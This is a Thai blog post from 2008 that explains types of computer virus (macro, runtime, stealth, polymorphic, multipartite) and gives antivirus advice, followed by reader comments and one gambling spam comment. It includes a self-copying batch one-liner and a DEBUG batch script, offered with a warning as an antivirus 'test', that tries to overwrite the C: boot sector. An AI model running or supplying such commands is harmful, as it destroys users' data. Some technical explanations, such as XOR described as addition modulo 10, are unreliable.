Viruses)

ในปัจจุบันนี้ ผู้ที่อยู่สำนักงานหรือองค์กรต่างๆ ที่ต้องอาศัย MS-Office เป็นโปรแกรมสร้างงานเอกสารและนำเสนอก็นับว่าโชคดีครับ หลังจากวินโดวส์ XP ทำการติดตั้ง File Wall เพิ่มเข้ามา ไวรัสจำพวกนี้เริ่มสูญหายไปกับการถูกปฏิเสธการใช้คำสั่ง การที่คุณจะป้องกันไวรัสจำพวกนี้คือต้องติดตั้งโปรแกรมฆ่าไวรัสรุ่นใหม่ เพื่อป้องกันคำสั่ง "มาโคร" ซึ่งเป็นภาษา "VBA ; Visual Basic Application" ของตัวโปรแกรม ซึ่งเดิมทีผู้จัดทำโปรแกรมหวังให้ภาษานี้ช่วยสนับสนุนการทำงานที่ยากๆ ของเอกสารสำนักงานให้ง่ายลงมาและมีประสิทธิภาพเท่าเทียมกับโปรแกรม แต่เพราะความสามารถของภาษา "มาโคร" นี้เองที่ผู้สร้างไวรัสหันไปศึกษาและหาช่องทางในการเล่นงานคนอื่นผ่านเอกสารเพียงฉบับเดียว สามารถแตกกระจายไปทั่วโลกได้อย่างน่ากลัว หนึ่งในไวรัสมาโครที่ประสบความสำเร็จด้านเลวร้ายคือ "เมลิซ่า Melisa" ในประเทศอเมริกา ซึ่งภายในชั่วข้ามคืน ไวรัสของเขาทำให้เครื่องนับ แสนเครื่องติดเชื้อและติดเชื้อแบบข้ามทวีปเลยทีเดียว ผมจึงอยากให้ทำความเข้าใจการทำงานของไวรัสจำพวกนี้ให้ดีและจะแนะนำว่า คุณมีโอกาศเพียงครั้งเดียวเท่านั้นในการคลิ๊ก ถ้าคุณเลือกตอบว่า "ใช้แมโคร" ก็เป็นอันว่า "ไวรัสจะซ่อนหน้าต่างนี้ไปจนกว่ามันจะตาย และเครื่องของคุณก็กลายเป็นทาสของมันทันที" เมื่อไวรัสสิงสถิตอยู่ในเครื่องของคุณแล้วคุณก็ไม่สามารถจะหยุดการทำงานของมันได้โดยง่าย เช่น ถ้าคุณคิดจะไปกำจัดพวกมันใน Visual Basic Editor คุณไม่สามารถกำจัดมันด้วยวิธีธรรมดาแน่นอน เพราะไวรัสพวกนี้แม้ว่าคุณจะลบแฟ้มที่ติดไวรัสไปแล้วแต่มันยังฝังอยู่ในระบบของคุณอยู่ วิธีที่จะกำจัดหลายๆ คน ลงโปรแกรมใหม่ และลบแฟ้มติดไวรัสทิ้งให้หมด...นั่นก็เป็นทางแก้ปัญหาอีกทางหนึ่ง แต่คุณคงต้องทำอย่างนั้นบ่อยๆ ถ้ารับเอกสารจากลูกค้าหรือเพื่อนในสำนักงานที่ติดไวรัสอยู่ วงจรนี้ก็จะกลับมาอีกไวรัสคอมพิวเตอร์ตามลักษณะการทำงาน

1. รันไทม์ (Runtime Viruses)

ไวรัสทำงานแบบรันไทม์ มันคือไวรัสชนิดแรกๆ ที่ผู้ที่เริ่มเขียนไวรัสสร้างขึ้น ซึ่งต้องทำความเข้าใจมันเสียก่อนเพื่อพัฒนาให้มันทำงานยากๆ ขึ้นไป ตัวอย่างคือ ข้อความต่อไปนี้ COPY *.BAT+%0.BAT *.BAT ไวรัสตัวอย่าง...มันจะทำงานแบบเรียบง่ายคือ...ถ้าเรียกทำงานจึงแสดงผล...ไม่เรียกก็ไม่ทำงาน...และทำไมผู้เขียนไวรัสถึงเขียนไวรัสซื่อบื้อพวกนี้ขึ้นมา

- มันเขียนง่ายเข้าใจง่าย

- จะตรวจจับหรือพบไวรัสเมื่อมันทำการติดเชื้อไวรัสแล้ว

ไวรัสแบบรันไทม์นี้ ในอดีตนั้นนิยมใช้คำสั่ง Find First และ Find Next หรือ บริการ 4EH และ 4FH ของดอสอินเตอร์รัพต์ เพื่อทำการค้นแฟ้มที่สามารถติดเชื้อไวรัสได้คล้ายๆ DIR /S เพื่อหาแฟ้ม .COM หรือ .EXE ทั้งระบบ ถ้ามันพบแฟ้มดังกล่าวจะเขียนคำสั่งไวรัสลงไป จากนั้นจะหยุดการทำงานทั้งหมด เพื่อมิให้เครื่องทำงานช้าผิดสังเกต และรอแค่ว่าจะมีการเรียกใช้แฟ้มคำสั่งไวรัสนี้อีกครั้ง ก็จะทำงานเช่นเดิม ในปัจจุบัน โค้ดไวรัสจำพวกนี้ถูกตรวจสอบด้าน "เฮอร์ริติก ; Heritic" คือการสังเกตพฤติกรรม หรือ วิธีตรวจสอบ "เช็คซัม; Check sum" โดยส่วนใหญ่แล้วไวรัสจำพวกนี้จะถูกตรวจจับได้ ถ้าไวรัสนี้ยังไม่พัฒนาเป็นโพลีมอฟิกไวรัสก็จะถูกทำลายจนหมด

2. สเติลช์ (Stealth Viruses)

ไวรัสชนิดนี้เราจะเรียกมันว่า "ไวรัสหลอกล่อดีบัก หรือ ไวรัสฝั่งตัว (TSR; Termenate Stay Resident)" ซึ่งจะเป็นไวรัสชั้นสูงเป็นส่วนใหญ่ ซึ่งการทำงานของไวรัสพวกนี้ ต้องอาศัยการ "รันไทม์" ในระบบปฏิบัติการเสียก่อน เช่นฝั่งตัวคำสั่งไวรัสใน COMMAND.COM เพื่อให้คำสั่งไวรัสฝั่งอยู่ในระบบเพื่อรอดักจับแฟ้ม .COM หรือ .EXE แฟ้มอื่น จากนั้นจะฝั่งคำสั่งล่องหนในหน่วยความ เพื่อไม่ให้โปรแกรมฆ่าไวรัสหรือผู้ใช้ระบบมองเห็นพวกมัน เช่น

- ถ้าระบบมีการตรวจสอบว่าแฟ้ม COMMAND.COM มีขนาดเป็นเท่าไร ไวรัสจะทำการหลอกระบบด้วยการแจ้งข้อมูลที่เป็น "เท็จ" เพื่อไม่ให้ระบบผิดสังเกตว่า COMMAND.COM มีขนาดเพิ่มขึ้น

- ถ้าระบบตรวจสอบแฟ้ม COMMAND.BAK ซึ่งเป็นแฟ้มที่ระบบสำรองเอาไว้ เพื่อดูว่า COMMAND.COM ตัวเดิมมีขนาดเท่าไร ไวรัสก็จะตรวจสอบว่าแฟ้ม COMMAND.BAK นั้นติดเชื้อไวรัสหรือยัง ถ้ายังไม่ติดเชื้อก็จะแทรกคำสั่งไวรัสลงไปทันที และก็ทำการแจ้งขนาดที่เป็น "เท็จ" เช่นเดิมเพื่อไม่ให้ระบบตรวจสอบได้

- ถ้าโปรแกรมฆ่าไวรัสทำการค้นไวรัสโดยดูว่าแฟ้มคำสั่งมีขนาดที่เปลี่ยนไปหรือไม่ หรือทำการสแกนค้นหาข้อความที่น่าจะเป็นไวรัส ไวรัสจะทำการย้ายหัวอ่านในตำแหน่งที่เป็นข้อมูลไวรัสไปยังตำแหน่งอื่น จากนั้นก็ย้ายหัวอ่านกลับมาที่แฟ้มเดิมในตำแหน่งที่ไม่ติดไวรัส ทำให้โปรแกรมฆ่าไวรัสหาไวรัสไม่เจอ แต่ไวรัสคอมพิวเตอร์ส่วนใหญ่ไม่ฉลาดนัก เพราะ แฟ้มคำสั่งสแกนไวรัสสมมุติเป็น NOD55.EXE ไวรัสจะตรวจสอบว่าโปรแกรมฆ่าไวรัสติดไวรัสหรือยัง ถ้ายังก็จะแพร่คำสั่งไวรัสลงไปในโปรแกรมสแกนไวรัสทันที ( โปรแกรมฆ่าไวรัสจึงกลายเป็นตัวแพร่เชื่อไวรัสทันทีถ้าไม่มีการอัปเดรตไวรัส) แต่ถ้าโปรแกรมฆ่าไวรัสที่ติดเชื้อไวรัสอยู่มีการ "อัปโหลด" กลับไปยังศูนย์วิจัยจะถูกตรวจสอบขนาดแบบ (Check Sum) เป็นผลให้พบไวรัสทันที เพราะว่าคำสั่งไวรัสไม่สามารถหลอกล่อดีบักเกอร์ในเครื่องที่ยังไม่ติดเชื้อไวรัสนั้นเอง เห็นไหม? ผู้ร้ายต้องตายตอนจบอยู่แล้วโดยสรุปคือ...ไวรัสจำพวก "เครื่องบินรบ" หรือ "สเติลช์" นั้นเป็นไวรัสที่ความสามารถสูงอย่างมากและต้องใช้ความสามารถในการสร้างมันพอสมควร อย่างที่กล่าวไว้แล้ว ไวรัสจำพวกนี้ถูกสร้างจาก "ภาษาระดับต่ำ" แต่เป็น "ไวรัสชั้นสูง" เพราะรูปแบบคำสั่งอันซับซ้อนของภาษา "แอสเซมบลี (Assembly)" ซึ่งน้อยคนในสมัยนี้จะรู้จักและเขียนภาษาระดับต่ำเหล่านี้ได้ ก็นับว่าดีอยู่บ้าง เพราะว่าไวรัสจำพวกนี้ในปัจจุบันหายากมากๆ เพราะระบบปฏิบัติการวินโดวส์นั้นทำงานแบบ "มัลติโปรแกรมมิ่ง ; Multiprograming" การจองหน่วยความจำเพื่อฝั่งคำสั่งหลอกล่อนั้นไม่สามารถทำได้ง่ายๆ และก็โชคดีที่การจองการทำงานในหน่วยความจำของวินโดวส์ต้องอาศัย "Task Process" เท่านั้น เราจึงสามารถตรวจสอบได้ว่ามีอะไรแปลกปลอมในหน่วยความจำในเครื่องของเราเอง

3. โพลีมอฟิก (Polymorphic Viruses)

ไวรัสจำพวกนี้ มันเหมือนกับ "โจรพันหน้า" เพราะหลักการของมันคือการทำให้โค้ดของไวรัสเปลี่ยนไปทุกๆ ครั้งที่มีการติดเชื้อ แต่การเปลี่ยนโค้ดของไวรัสนั้นจะต้องรักษาคุณสมบัติของไวรัสแม่แบบอย่างคบถ้วนเพื่อไม่ให้ไวรัสเกิดการทำงานที่ผิดพลาด

3.1. ต้นแบบไวรัสคือ 012345678X ซึ่งตัวเลขชุดนี้สมมุติให้เป็นคำสั่งไวรัสทั้งชุดคำสั่ง ตัวเลขในนั้นห้ามผิดเพี้ยนไปแม้แต่ตัวเดียวถ้าผิดจะทำให้ไวรัสทำงานผิดพลาด สุ่ม X = 6 จะกลายพันธ์เป็น (0+6)(1+6)(2+6)(3+6)(4+6)(5+6)(6+6)(7+6)(8+6)(X=6) = 6789012346 (ทำไม 4+6เป็น 10 และทำไมในตัวอย่างเป็น 0 เพราะ คอมพิวเตอร์จะตัดเลขตัวแรกออกให้ได้ค่าของ XOR ทางคณิตศาสตร์)

3.2. เมื่อไวรัสติดเชื้อแฟ้มเป้าหมายจะทำการถอดรหัสของตัวเองจาก 6789012346 X = 6 (X คือค่าที่ถูกสุ่มขึ้นมาเก็บเอาไว้ในตัวสุดท้าย)" กลายเป็น (6-6)(7-6)(8-6)(9-6)(0-6)(1-6)(2-6)(3-6)(4-6)(X-6) เป็น 0123456789X อีกครั้งเพื่อเรียกคำสั่งไวรัสทำงาน...จากนั้นจะทำการสุ่ม X ขึ้นมาใหม่และกลายพันธ์เป็นเลขตัวอื่นต่อไป...ดังนี้

3.3. เมื่อไวรัสในข้อ 2 ต้องการแพร่เชื้อไปยังแฟ้มเป้าหมายอีกครั้ง X = 3 (สุ่มมาใหม่) จะกลายพันธ์เป็น (0+3)(1+3)(2+3)(3+3)(4+3)(5+3)(6+3)(7+3)(8+3)(X=3) = 3456789013 ซึ่ง 34567893 จะไม่มีความเหมือน 6789012346 แม้แต่นิดเดียว....ทำให้โปรแกรมฆ่าไวรัส...สแกนข้อความที่ซ้ำกันไม่เจอ...(ยกเว้น...จะหาโค้ดสำคัญที่ใช้ในการเข้ารหัสในนั้นได้...หรือที่เรียกว่า "อัลกอลิทึม" เจอ...จึงสแกนฆ่ามันได้ทุกตัว) ไม่จำเป็นเสมอไปครับที่อัลกอลิทึมของคณิตศาสตร์หรือสมการเข้ารหัสจะต้องเป็นตัวเดียวกันหรือ ใช้คำสั่ง "อเล็กซันเดอร์มหาราช" ตามตัวอย่างที่กล่าวมา แต่การคำนวนเข้ารหัสในคอมพิวเตอร์ ภาษาใดๆ ก็ตาม นิยมใช้คำสั่ง (Excucive OR; XOR) เพื่อทำการเข้ารหัส ซึ่งรูปแบบของคำสั่งคล้ายๆ การคำนวณที่ผ่านมาเพียงแต่อยู่บนพื้นฐานของตรรกะวิทยาซึ่งไม่มีนิยามที่ยุ่งยาก

0 XOR 0 = 0 0 XOR 1 = 1 1 XOR 0 = 1 1 XOR 1 = 0

ตรรกะนิยามคือ "เลขต่างกันให้เป็น 1"

VIRUS XOR RANDOM = KEY และย้อนกับเป็น KEY XOR RANDOM = VIRUS

สมมุติไวรัสมี 1 บิต

1 XOR 1 = 0 และย้อนกับเป็น 0 XOR 1 = 1

สมมุติไวรัสมี 4 บิต

1011 XOR 1110 = 0101 และย้อนกับเป็น 0101 XOR 1110 = 10114. มัลติเพลต (Multipartite Viruses)

"ไวรัสกลายพันธ์" หรือ "หลากหลายสายพันธ์" มัลติเพลตไวรัสเป็นไวรัสจำพวกหนึ่งที่มีความสามารถทางภาษา คือ ในไวรัสตัวเดียวนั้นอาจประกอบไปด้วยภาษาคอมพิวเตอร์มากกว่า หนึ่งภาษา เพื่อให้ไวรัสสามารถกระจายเชื้อไปได้อย่างกว้างขวาง ซึ่งในภาษาคอมพิวเตอร์ภาษาใดก็ตามที่เขียนอยู่ในไวรัส สามารถแพร่กระจายตัวเองไปยัง "แพลตฟอร์ม ; Partform" เดียวกันได้และยังมีความสามารถแพร่เชื้อไปยังแพลตฟอร์มอื่นๆ ได้ด้วย บางตัวสามารถกระจายไปยัง Binary Code หรือภาษาระดับต่ำเพื่อติดเชื้อแฟ้มระบบ .EXE หรือ .COM ได้ โดยตัวไวรัสจะบรรจุคำสั่ง Binary Code เก็บเอาไว้ในตัวของมันซึ่งบางครั้งเป็น "เทกซ์ ; Text" หรือ "ข้อความ" ทั่วไป ผ่านการประมวลผลและคัดลอกทั้งชุดคำสั่งไวรัสไปเก็บเอาไว้ในเป้าหมายทุกๆ คำสั่ง แม้ว่าจะไม่ใช่ภาษาที่ฟอร์มนั้นก็ตาม ดูตามรูป

ภาษาคอมพิวเตอร์ จะแยกแพลตฟอร์มออกเป็น 3 ระดับด้วยกัน คือ

1. คำสั่งภาษาเครื่อง หรือ Binary Code ซึ่งจะพบในไวรัสบูตเซกเตอร์

2. คำสั่งภาษา Asembly Code คือภาษา ที่ใช้ควบคุมระบบปฏิบัติการ (ถึงแม้จะเก็บเป็น Binary Code แต่มีรูปแบบของชุดคำสั่งที่แน่นอน)

3. ภาษาสคริป จะเป็นเพียงข้อความที่จะประมวลผลผ่าน Programs อีกที

ไอคอนตัวอย่างแสดงให้เห็นถึง "แพลตฟอร์ม" ต่างๆ ในที่นี้แค่ยกตัวอย่าง ซึ่งฟอร์มต่างๆ มากมายในระบบปฏิบัติการนั้นสามารถถูกไวรัสจำพวกนี้เชื่อมต่อคำสั่งได้หมดไม่เว้นแม่แต่ "บูตเซกเตอร์" ในระดับล่างสุด ถ้าเวิร์มเมอร์ที่มีประสบการณ์อย่างสูง...จะสามารถเขียนไวรัสเชื่อมต่อ "แพลตฟอร์มระดับต่ำ" กับ "แพลตฟอร์มระดับสูงได้"

การป้องกันไวรัสที่และคุณสมบัติของโปรแกรมฆ่าไวรัสที่ดี....

คืออย่างนี้ครับ...ในโลกเราทุกวันนี้...คนเขียนกับคนฆ่าไวรัส...นั้นปริมาณของคน 2 กลุ่มนี้...ดูแตกต่างกันมากมาย...คุณอ่านมาอาจจะเห็นว่ามีนักเขียนไวรัสแค่คนเดียว...กับนักฆ่าไวรัสอาจทำให้ CERT ของไทยเราร่วม 100 คน ทำงานทั้งคืน...เพราะไวรัสอีกนับร้อยที่กะจายตัวอยู่ขณะนี้ซึ่งไวรัสเด็กๆ ชิว...ก็เห็นตอบกระทู้กันเกลื่อน...แต่ถ้าเป็นไวรัสแบบพี่บิ๊กคงต้องให้ออกข่าว...และทาง MicroSoft ออก "แพทช์" เสริมกันยกใหญ่เอาล่ะ...อย่าว่าเป็นคดีวัวหายล้อมคอกกันเลย...เพราะนักเขียนไวรัสบางคนใช้เทคนิคที่พึ่งปรึกษากันกับนักเขียนไวรัสด้วยกัน...เล่นงานเราได้...ก็ต้องอาศัยการศึกษามานับเดือนเหมือนกัน...จึงเริ่มออกสตาร์ทก่อนเสมอในการวิ่ง 100 เมตร...

1. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกัน ระบบ Kernal ของระบบปฏิบัติการได้

ทดสอบการโจมตีด้วยคำสั่งนี้

**** อันตรายอย่างมาก...ระบบอาจพินาศแค่คลิ๊กเดียวของคุณ...ก่อนอื่นให้คุณเข้าสู่ CMOS ตรวจสอบให้ดีว่า Virus Protection Option ถูกติดตั้งหรือยัง...เพราะช่างซ่อมคอมพิวเตอร์บางคนเพิกเฉยต่อคำสั่งนี้...ก็เป็นอันว่า...คำสั่งนี้จะทำให้ฮาร์ดดิสก์คุณพินาศ...

:: แบทไฟล์ทดสอบความสามารถของโปรแกรมฆ่าไวรัส

:: ด้วยการ Clean Boot Sector ไดร์ฟ C:

@echo W 0 3 0 1 > Nuke.SCR

@echo Q>Nuke.SCR

@DEBUG < NUKE.SCR

เมื่อคุณปิดการทำงานของ Virus Protection ใน CMOS ก็อาจจะเจอคำสั่งทำลายล้างมหาวินาศ นี้ซะ...อย่างที่ไม่รู้เลยว่าเครื่องคุณโดนอะไร...จึงฝากเตือนช่างซ่อมทั้งหลายด้วยครับว่าเปิดมันซะ...ถ้าคุณใช้วินโดวส์ โดยไม่มีลีนุกซ์ย่ำนะครับ...คำสั่งมีไว้ศึกษาทดลอง...แต่ไม่ใช่ให้ไปแกล้งคนอื่นกัน

2. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการ "ฮุกอินเตอร์รัพต์ ของ TSR ไวรัส" ได้************** จะมาเพิ่มคำสั่ง Hook Interupt ไวรัสเพื่อตรวจสอบ3. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการเข้าแทรกแซง "Rootkit" จาก System Virus ได้************** ติดตามในไวรัสคอมพิวเตอร์ใกล้ตัวกว่าที่คุณ ภาค 3


4. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการหยุดการทำงานหรือลบโปรแกรมฆ่าไวรัสทิ้ง จาก "รีโทรลไวรัส"************** จะมาเพิ่มคำสั่งหยุดโปรแกรมฆ่าไวรัสภายหลังแล้วเราจะปลอดภัยจากไวรัสได้อย่างไร...

- สิ่งที่ป้องกันเครื่องของคุณจากไวรัส...(ไม่มีครับ...เพราะไวรัสไม่ได้มาในรูปแบบของ อุปกรณ์แฟลชไดร์ฟอย่างเดียว) ทางที่เราจะสามารถป้องกันมันได้...ก็คือภมิคุ้มกันทางมันสมองและสองมือของคุณเท่านั้น...ผมจะอธิบายให้กระจ่างว่าไวรัสมาได้กี่ช่องทาง

- ไวรัสสามารถมาได้แม้ว่าคุณติดโปรแกรมฆ่าไวรัส...เพราะมันถูกเขียนขึ้นมาใหม่...ภายในไม่กี่ชั่วโมงก่อนที่คุณจะเห็นข่าวในทีวี...จากนั้นมันจะกระจายตัวในเครื่องคุณและเครื่อข่าย...ก่อนที่โปรแกรมฆ่าไวรัสจะหาทางกำจัดมันได้...และกว่าคุณจะรู้ว่าติดไวรัสสายพันธ์ใหม่ซะแล้ว...ก็ต่อเมื่อ...เรื่องนี้...เป็นเรื่องเล่าขานผ่านทางโทรศัพท์และกระทู้ที่โพสต์ในวันรุ่งขึ้น ไวรัสรุ่นเก่า...ก็สามารถแพร่เชื้อผ่านเครื่องที่คุณคิดว่าไม่ต้องติดตั้งโปรแกรมฆ่าไวรัสเพราะทำให้เครื่องช้า...เป็นเหตุผลให้ ... "เด็กยุคใหม่ที่ไม่มีวัคซีนป้องกันฝีดาษ พากันล่มตายเพราะ...คิดว่าไวรัสยุคเก่าจะไม่กลับมา"

- ช่องทางทำลายล้างผ่าน VBScript ของ Internet Exproler ช่องทางนี้...นับว่าน่ากลัวมากครับ...สำหรับผู้ที่ใช้งาน IE อยู่ ถ้าเป็น"ไฟฟอกซ์" นั้น สคริป VBS จะไม่ถูกเรียกใช้งานแต่ ใช่ว่าจะไม่มีไวรัสแต่บนบราว์เซอร์ตัวอื่น ที่บล็อกการทำงานของ VBS นั้นก็ยังปลอดภัยกว่าที่จะให้สคริป VBS ส่งผลต่อเครื่องของพวกคุณ อย่างที่เคยผ่านมาใน I Love You หรือ "ไวรัสเลิฟบัก" จงจำไว้อย่างเดียวเลยครับว่า...ไม่มีเวปหรือ Blog ที่ปลอดภัยอยู่ในโลกครับ...ตัวอย่างที่ดีคือ blog ของผม...ถ้าคุณใช่ IE อยู่ ดูได้จาก View...Source...ซึ่งคำสั่งของเอกสาร HTML แสดงถ้าคุณไม่เคยเรียนคำสั่งพวกนี้ต่อให้มันมีไวรัสหรือ แอดแวร์ ฝั่งอยู่ คุณก็ไม่มีทางกำจัดมันได้หรือรู้ได้ว่ามันทำอะไรกับเครื่องของพวกคุณ ซึ่งความปลอดภัยของเวบบล็อกนี้...จะถูกดูแลโดย Server ของแต่ละเวปบล็อก ครับ...โดยพวกเค้าจะมี เอกสารควบคู่หรือ อาเรย์เวป และสถาปัตยกรรม

"พล็อกซี่" ซึ่งจะทำการตรวจและดูแลกันแหละกันอย่าง "ฝาแฝด"ถ้า "คนใดติดโรค" กล่าวคือ "ถ้าโคลนนิ่งมีความแตกต่างกันแสดงว่ามีความผิดปกติด้านพันธุกรรมทันทีจะถูกตรวจสอบด้วย ค่าความถูกต้องที่เก็บเอาไวรัสใน เครื่อง (พล็อกซี่) ทั้งสองมาเปรียบเทียบกันเพื่อหาค่าแตกต่างซึ่งนั้นก็คือไวรัส ... และจะถูกกำจัดทันที" เฮอ...หมดห่วงเรื่องนี้ได้...ยกเว้น...วันใด...มีไวรัสหลุดสถาปัตกรรมรูปแบบนี้มา...ก็เป็นข่าวใหญ่กันCreate Date : 15 ธันวาคม 2551
Last Update : 4 พฤษภาคม 2556 17:04:48 น. 11 comments
Counter : 1133 Pageviews.

 
โดน HEUR/Crypted.E รบกวน จะแก้ไขได้ยังไง ...ฮือฮือ..


โดย: jimzillla IP: 115.67.148.184 วันที่: 16 ธันวาคม 2551 เวลา:11:02:22 น.  

 
สวัสดีค่า

พอดีหนูลองใช้วิธีล็อคโฟลเดอร์ของพี่จากเวป

//www.pantip.com/tech/software/topic/SO2684917/SO2684917.html

แล้วคราวนี้หนูล็อคอีกโฟรเดอร์นึง

แล้วมัน save key ทับกัน

ทำให้เปิด โฟรเดอร์อันที่1 ไม่ได้

มีวิธีกู้คืนมั้ยคะ

รบกวนส่งมา

arinajji@hotmail.com

คร่า

ขอบคุณมากค่ะ


โดย: arinajji IP: 125.25.251.254 วันที่: 16 ธันวาคม 2551 เวลา:11:10:56 น.  

 
ตอบคนแรกก่อนนะคับ...
ไม่มีโปรแกรมฆ่าไวรัสหรือนักฆ่าไวรัสใดๆ ฆ่าไวรัสที่
เขายังไม่เห็นหน้าตามันครับ...ส่งตัวอย่างมา...ถึงฆ่าได้


โดย: แคทอาย IP: 117.47.10.242 วันที่: 16 ธันวาคม 2551 เวลา:12:18:04 น.  

 
ตอบ คห 2 ครับ...
1. สร้าง Shot Cut โฟลเดอร์ที่ว่ามา
2. คลิกขวาที่โฟลเดอร์ และคัดลอกข้อความใน Target
ซึ่งเป็นที่อยู่ของโปรแกรม
3. จากนั้นเปิด Notepad ขึ้นมา
4. พิมพ์คำว่า del /arsh (วรรคและวางข้อความที่คัดลอกลงไป)
5. แทรกข้อความว่า \\desktop.ini ในเครื่องหมายคำพูด
ตอนท้ายคำสั่ง
6. บันทึก..ในชื่อ ReFile.CMD
7. คลิ๊กมันทำงาน ครับ จบแหละ...


โดย: แคทอาย IP: 117.47.10.242 วันที่: 16 ธันวาคม 2551 เวลา:12:22:19 น.  

 
เอ...เวปบอร์ดนี้ คำสั่ง \\ มันจะมีสองตัวครับ...จริงๆ มีตัวเดียวนะ...โพสต์ใหม่

ตอบ คห 2 ครับ...
1. สร้าง Shot Cut โฟลเดอร์ที่ว่ามา
2. คลิกขวาที่ Shotcut และคัดลอกข้อความใน Target
ซึ่งเป็นที่อยู่ของโปรแกรม
3. จากนั้นเปิด Notepad ขึ้นมา
4. พิมพ์คำว่า del /arsh (วรรคและวางข้อความที่คัดลอกลงไป)
5. แทรกข้อความว่า \\desktop.ini ในเครื่องหมายคำพูด
ตอนท้ายคำสั่ง (เครื่องหมาย \\ มีตัวเดียวเท่านั้น)
6. บันทึก..ในชื่อ ReFile.CMD
7. คลิ๊กมันทำงาน ครับ จบแหละ...


โดย: แคทอาย IP: 117.47.10.242 วันที่: 16 ธันวาคม 2551 เวลา:12:24:42 น.  

 
ขอบคุณครับสำหรับความรู้ดีๆที่แบ่งปันกัน


โดย: am97@windownlive.com IP: 124.120.234.90 วันที่: 16 ธันวาคม 2551 เวลา:18:56:08 น.  

 
555 return กลับมาอีกครั้ง


โดย: zerconia IP: 125.24.179.96 วันที่: 17 ธันวาคม 2551 เวลา:15:40:59 น.  

 
สวัสดีคุณ แคทอาย ครับ
น่าจะเอาบทความนี้ไปโพสท์ใน Pantip นะครับ ความรู้เยอะดีึครับ เสียดายโดนลบไปตั้งเยอะแนะใน Blog ของท่านน่ะครับ


โดย: Hunter Virus IP: 202.149.24.161 วันที่: 22 ธันวาคม 2551 เวลา:20:38:20 น.  

 
ขอเปงลูกศิษย์ ศึกษาเพื่อหาวิธีแก้ไข อิอิ


โดย: ง๊องแง๊ง IP: 118.173.99.51 วันที่: 31 มีนาคม 2552 เวลา:13:44:23 น.  

 
ผมใช้โปรแกรม Deep Freeze เป็นโปรแกรมแช่แข็งคอม
แต่พอลงไปแล้วเวลาลงโปรแกรมเพิ่มหรือเก็บข้อมูลหรือเอกกระสารก็จะหายหมดจะทำงัยดีลบก็ลบได้ไม่มีที่หัยลบเลยAdd Remove Programs ก็ไม่มีหัยลบเข้าไปในคำสั่ง
run regedit ก็ลบไม่ได้ ไปที่โปรแกรมไฟล์ก็ลบไม่ได้จะต้องทำงัยถึงจะลบได้..หรือว่าหยุดการทำงานของโปรแกรมนี้


โดย: โจ IP: 113.53.114.169 วันที่: 24 กันยายน 2552 เวลา:19:31:50 น.  

 
Gclubclick ศูนย์รวมคาสิโนดัง พนันบอล แค่คลิกเดียวที่มีให้ท่านได้ร่วมสนุกกับเราไม่ว่าจะเป็นคาสิโนยอดนิยม และคาสิโนใหม่ ๆ เช่น GClub , Royal1688 , Ruby888 , Holiday-Palace , Genting-Crown ,Reddragon88 ท่านจะได้สัมผัสบรรยากาศจริง sภายในคาสิโนจริงทุกเกมส์การ เล่นตื่น เต้นเราใจ และนอกจากคาสิโนคุณภาพที่เราคัดสรรมาให้ ท่าน แล้วทาง
Gclubclick.com เองยังมี SportBetting Onlineให้ท่านได้เลือกเดิมพนันกีฬาโปรด ที่ท่านชื่นชอบอย่างจุใจ อาทิ เช่น SBOBET ,IBCBET , WinningFT , MMMBET ท่าน สามารถเปิดเล่นกับเราได้แล้ววันนี้ ทางเรามีพนักงาน Call Center ไว้คอยบริการท่านด้วยความเป็นกับเองประทับ ในตลอด 24 ชม.
ติดต่อสอบถาม 24 ชัวโมง
081-122-5019 , 081-122-4019 , 080-559-7275
//www.Gclubclick.com
//gclubclick.blogspot.com/


โดย: gclubclick IP: 223.206.197.138 วันที่: 24 เมษายน 2555 เวลา:15:09:42 น.  

Valentine's Month


 
ธนัตถ์เดชน์
Location :
ขอนแก่น Thailand

[Profile ทั้งหมด]

ให้ทิปเจ้าของ Blog [?]
ฝากข้อความหลังไมค์
Rss Feed
Smember
ผู้ติดตามบล็อก : 9 คน [?]
การเรียนรู้...ไม่มีวันจบสิ้น
Friends' blogs
[Add ธนัตถ์เดชน์'s blog to your web]
Links
 

 Pantip.com | PantipMarket.com | Pantown.com | © 2004 BlogGang.com allrights reserved.